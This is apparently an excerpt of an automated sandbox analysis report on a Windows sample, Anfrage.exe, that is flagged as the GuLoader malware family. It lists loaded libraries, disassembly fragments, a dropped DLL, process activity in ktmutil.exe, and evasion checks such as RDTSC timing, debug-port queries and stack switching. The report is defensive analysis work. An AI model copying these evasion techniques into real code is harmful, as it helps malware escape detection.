            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Anfrage.exeStatic file information: File size 1251520 > 1048576
            Source: Anfrage.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: mshtml.pdb source: Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mrdYGoZBmXi.exe, 00000008.00000000.2402775106.0000000000EDE000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: wntdll.pdbUGP source: Anfrage.exe, 00000007.00000003.2390764590.00000000361DC000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2388742992.0000000036024000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Anfrage.exe, Anfrage.exe, 00000007.00000003.2390764590.00000000361DC000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2388742992.0000000036024000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdbGCTL source: Anfrage.exe, 00000007.00000002.2484828472.00000000062AA000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484828472.00000000062B9000.00000004.00000020.00020000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000002.2646658528.0000000000838000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdb source: Anfrage.exe, 00000007.00000002.2484828472.00000000062AA000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484828472.00000000062B9000.00000004.00000020.00020000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000002.2646658528.0000000000838000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000007.00000002.2476095227.00000000020FA000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2122397614.00000000034FA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363927FA pushad ; ret 7_2_363927F9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3639225F pushad ; ret 7_2_363927F9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3639283D push eax; iretd 7_2_36392858
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C09AD push ecx; mov dword ptr [esp], ecx7_2_363C09B6
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02F999D2 pushfd ; iretd 8_2_02F999E6
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02F8E67C push ebx; ret 8_2_02F8E682
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02FA060C push ebp; ret 8_2_02FA0619
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02FABFB8 push ds; iretd 8_2_02FABFD4
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02F99C11 push edi; retf 8_2_02F99C12
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0330225F pushad ; ret 9_2_033027F9
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033027FA pushad ; ret 9_2_033027F9
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033309AD push ecx; mov dword ptr [esp], ecx9_2_033309B6
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0330283D push eax; iretd 9_2_03302858
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028CE7F9 push edi; retf 9_2_028CE7FA
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028CE5C3 pushfd ; iretd 9_2_028CE5CE
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028E088A push edi; iretd 9_2_028E088B
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028C3264 push ebx; ret 9_2_028C326A
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028D51F4 push ebp; ret 9_2_028D5201
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028DDA60 push cs; ret 9_2_028DDBA3
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028E19DF pushfd ; retf 9_2_028E19E0
            Source: C:\Users\user\Desktop\Anfrage.exeFile created: C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Anfrage.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Anfrage.exeAPI/Special instruction interceptor: Address: 3B3FE93
            Source: C:\Users\user\Desktop\Anfrage.exeAPI/Special instruction interceptor: Address: 273FE93
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\Anfrage.exeRDTSC instruction interceptor: First address: 3B0041C second address: 3B0041C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 mov edi, 000000E6h 0x00000008 cmp edi, 6ED590EBh 0x0000000e jg 00007F03D4F04CA5h 0x00000014 pop edi 0x00000015 cmp ebx, ecx 0x00000017 jc 00007F03D4EC497Fh 0x00000019 test dx, bx 0x0000001c inc ebp 0x0000001d cmp eax, 66B5E70Fh 0x00000022 inc ebx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\Anfrage.exeRDTSC instruction interceptor: First address: 270041C second address: 270041C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 mov edi, 000000E6h 0x00000008 cmp edi, 6ED590EBh 0x0000000e jg 00007F03D4775F55h 0x00000014 pop edi 0x00000015 cmp ebx, ecx 0x00000017 jc 00007F03D4735C2Fh 0x00000019 test dx, bx 0x0000001c inc ebp 0x0000001d cmp eax, 66B5E70Fh 0x00000022 inc ebx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364916A6 rdtsc 7_2_364916A6
            Source: C:\Users\user\Desktop\Anfrage.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Anfrage.exeAPI coverage: 0.1 %
            Source: C:\Windows\SysWOW64\ktmutil.exeAPI coverage: 2.0 %
            Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405665
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_004060C7 FindFirstFileA,FindClose,0_2_004060C7
            Source: Anfrage.exe, 00000007.00000002.2484828472.00000000062AA000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2389278844.00000000062AA000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2389055505.00000000062AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Anfrage.exe, 00000007.00000002.2484575388.0000000006248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
            Source: C:\Users\user\Desktop\Anfrage.exeAPI call chain: ExitProcess graph end nodegraph_0-3753
            Source: C:\Users\user\Desktop\Anfrage.exeAPI call chain: ExitProcess graph end nodegraph_0-3939
            Source: C:\Windows\SysWOW64\ktmutil.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364916A6 rdtsc 7_2_364916A6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364035C0 NtCreateMutant,LdrInitializeThunk,7_2_364035C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF626 mov eax, dword ptr fs:[00000030h]7_2_363BF626
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF626 mov eax, dword ptr fs:[00000030h]7_2_363BF626
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF626 mov eax, dword ptr fs:[00000030h]7_2_363BF626
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF626 mov eax, dword ptr fs:[00000030h]7_2_363BF626
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF626 mov eax, dword ptr fs:[00000030h]7_2_363BF626
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF626 mov eax, dword ptr fs:[00000030h]7_2_363BF626
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF626 mov eax, dword ptr fs:[00000030h]7_2_363BF626
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF626 mov eax, dword ptr fs:[00000030h]7_2_363BF626
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF626 mov eax, dword ptr fs:[00000030h]7_2_363BF626
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3645D660 mov eax, dword ptr fs:[00000030h]7_2_3645D660
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C3616 mov eax, dword ptr fs:[00000030h]7_2_363C3616
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C3616 mov eax, dword ptr fs:[00000030h]7_2_363C3616
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F1607 mov eax, dword ptr fs:[00000030h]7_2_363F1607
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FF603 mov eax, dword ptr fs:[00000030h]7_2_363FF603
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F9660 mov eax, dword ptr fs:[00000030h]7_2_363F9660
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F9660 mov eax, dword ptr fs:[00000030h]7_2_363F9660
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495636 mov eax, dword ptr fs:[00000030h]7_2_36495636
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647F6C7 mov eax, dword ptr fs:[00000030h]7_2_3647F6C7
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364816CC mov eax, dword ptr fs:[00000030h]7_2_364816CC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364816CC mov eax, dword ptr fs:[00000030h]7_2_364816CC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364816CC mov eax, dword ptr fs:[00000030h]7_2_364816CC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364816CC mov eax, dword ptr fs:[00000030h]7_2_364816CC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B76B2 mov eax, dword ptr fs:[00000030h]7_2_363B76B2
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B76B2 mov eax, dword ptr fs:[00000030h]7_2_363B76B2
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B76B2 mov eax, dword ptr fs:[00000030h]7_2_363B76B2
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BD6AA mov eax, dword ptr fs:[00000030h]7_2_363BD6AA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BD6AA mov eax, dword ptr fs:[00000030h]7_2_363BD6AA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364536EE mov eax, dword ptr fs:[00000030h]7_2_364536EE
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364536EE mov eax, dword ptr fs:[00000030h]7_2_364536EE
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364536EE mov eax, dword ptr fs:[00000030h]7_2_364536EE
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364536EE mov eax, dword ptr fs:[00000030h]7_2_364536EE
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364536EE mov eax, dword ptr fs:[00000030h]7_2_364536EE
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364536EE mov eax, dword ptr fs:[00000030h]7_2_364536EE
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647D6F0 mov eax, dword ptr fs:[00000030h]7_2_3647D6F0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644368C mov eax, dword ptr fs:[00000030h]7_2_3644368C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644368C mov eax, dword ptr fs:[00000030h]7_2_3644368C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644368C mov eax, dword ptr fs:[00000030h]7_2_3644368C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644368C mov eax, dword ptr fs:[00000030h]7_2_3644368C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F36EF mov eax, dword ptr fs:[00000030h]7_2_363F36EF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363ED6E0 mov eax, dword ptr fs:[00000030h]7_2_363ED6E0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363ED6E0 mov eax, dword ptr fs:[00000030h]7_2_363ED6E0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F16CF mov eax, dword ptr fs:[00000030h]7_2_363F16CF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CB6C0 mov eax, dword ptr fs:[00000030h]7_2_363CB6C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CB6C0 mov eax, dword ptr fs:[00000030h]7_2_363CB6C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CB6C0 mov eax, dword ptr fs:[00000030h]7_2_363CB6C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CB6C0 mov eax, dword ptr fs:[00000030h]7_2_363CB6C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CB6C0 mov eax, dword ptr fs:[00000030h]7_2_363CB6C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CB6C0 mov eax, dword ptr fs:[00000030h]7_2_363CB6C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36493749 mov eax, dword ptr fs:[00000030h]7_2_36493749
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C973A mov eax, dword ptr fs:[00000030h]7_2_363C973A
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C973A mov eax, dword ptr fs:[00000030h]7_2_363C973A
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9730 mov eax, dword ptr fs:[00000030h]7_2_363B9730
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9730 mov eax, dword ptr fs:[00000030h]7_2_363B9730
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F5734 mov eax, dword ptr fs:[00000030h]7_2_363F5734
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646375F mov eax, dword ptr fs:[00000030h]7_2_3646375F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646375F mov eax, dword ptr fs:[00000030h]7_2_3646375F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646375F mov eax, dword ptr fs:[00000030h]7_2_3646375F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646375F mov eax, dword ptr fs:[00000030h]7_2_3646375F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646375F mov eax, dword ptr fs:[00000030h]7_2_3646375F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C3720 mov eax, dword ptr fs:[00000030h]7_2_363C3720
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DF720 mov eax, dword ptr fs:[00000030h]7_2_363DF720
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DF720 mov eax, dword ptr fs:[00000030h]7_2_363DF720
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DF720 mov eax, dword ptr fs:[00000030h]7_2_363DF720
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FF71F mov eax, dword ptr fs:[00000030h]7_2_363FF71F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FF71F mov eax, dword ptr fs:[00000030h]7_2_363FF71F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C5702 mov eax, dword ptr fs:[00000030h]7_2_363C5702
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C5702 mov eax, dword ptr fs:[00000030h]7_2_363C5702
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C7703 mov eax, dword ptr fs:[00000030h]7_2_363C7703
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB765 mov eax, dword ptr fs:[00000030h]7_2_363BB765
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB765 mov eax, dword ptr fs:[00000030h]7_2_363BB765
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB765 mov eax, dword ptr fs:[00000030h]7_2_363BB765
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB765 mov eax, dword ptr fs:[00000030h]7_2_363BB765
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648972B mov eax, dword ptr fs:[00000030h]7_2_3648972B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647F72E mov eax, dword ptr fs:[00000030h]7_2_3647F72E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3649B73C mov eax, dword ptr fs:[00000030h]7_2_3649B73C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3649B73C mov eax, dword ptr fs:[00000030h]7_2_3649B73C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3649B73C mov eax, dword ptr fs:[00000030h]7_2_3649B73C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3649B73C mov eax, dword ptr fs:[00000030h]7_2_3649B73C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D3740 mov eax, dword ptr fs:[00000030h]7_2_363D3740
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D3740 mov eax, dword ptr fs:[00000030h]7_2_363D3740
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D3740 mov eax, dword ptr fs:[00000030h]7_2_363D3740
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF7BA mov eax, dword ptr fs:[00000030h]7_2_363BF7BA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF7BA mov eax, dword ptr fs:[00000030h]7_2_363BF7BA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF7BA mov eax, dword ptr fs:[00000030h]7_2_363BF7BA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF7BA mov eax, dword ptr fs:[00000030h]7_2_363BF7BA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF7BA mov eax, dword ptr fs:[00000030h]7_2_363BF7BA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF7BA mov eax, dword ptr fs:[00000030h]7_2_363BF7BA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF7BA mov eax, dword ptr fs:[00000030h]7_2_363BF7BA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF7BA mov eax, dword ptr fs:[00000030h]7_2_363BF7BA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF7BA mov eax, dword ptr fs:[00000030h]7_2_363BF7BA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363ED7B0 mov eax, dword ptr fs:[00000030h]7_2_363ED7B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647F78A mov eax, dword ptr fs:[00000030h]7_2_3647F78A
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CD7E0 mov ecx, dword ptr fs:[00000030h]7_2_363CD7E0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644F7AF mov eax, dword ptr fs:[00000030h]7_2_3644F7AF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644F7AF mov eax, dword ptr fs:[00000030h]7_2_3644F7AF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644F7AF mov eax, dword ptr fs:[00000030h]7_2_3644F7AF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644F7AF mov eax, dword ptr fs:[00000030h]7_2_3644F7AF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644F7AF mov eax, dword ptr fs:[00000030h]7_2_3644F7AF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364497A9 mov eax, dword ptr fs:[00000030h]7_2_364497A9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647D7B0 mov eax, dword ptr fs:[00000030h]7_2_3647D7B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647D7B0 mov eax, dword ptr fs:[00000030h]7_2_3647D7B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C57C0 mov eax, dword ptr fs:[00000030h]7_2_363C57C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C57C0 mov eax, dword ptr fs:[00000030h]7_2_363C57C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C57C0 mov eax, dword ptr fs:[00000030h]7_2_363C57C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364937B6 mov eax, dword ptr fs:[00000030h]7_2_364937B6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647F453 mov eax, dword ptr fs:[00000030h]7_2_3647F453
